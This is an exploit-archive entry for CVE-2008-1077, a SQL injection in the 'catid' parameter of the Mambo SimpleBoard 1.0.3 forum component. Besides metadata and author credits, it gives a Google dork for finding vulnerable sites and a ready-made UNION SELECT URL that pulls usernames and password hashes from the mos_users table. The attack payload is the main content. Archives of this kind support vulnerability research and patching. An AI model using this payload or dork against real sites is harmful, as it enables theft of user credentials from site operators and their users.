[] NeoSense

Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection

Author: it's my
type: webapps
platform: php
port: 
date_added: 2008-02-26 
date_updated: 2016-11-14 
verified: 1 
codes: OSVDB-42548;CVE-2008-1077 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################
##
##  Mambo Simpleboard Forum Component 1.0.3 Stable (com_simpleboard)
##
##
##  Author: it's my, Scipio, xcedz
##
##  Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"index.php?option=com_simpleboard"
##
#########################################################

   Exploit:

http://site.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0x3a,password),5+from+mos_users/*

#########################################################
## Together, we have strength =) ####    www.antichat.ru
#########################################################

# milw0rm.com [2008-02-27]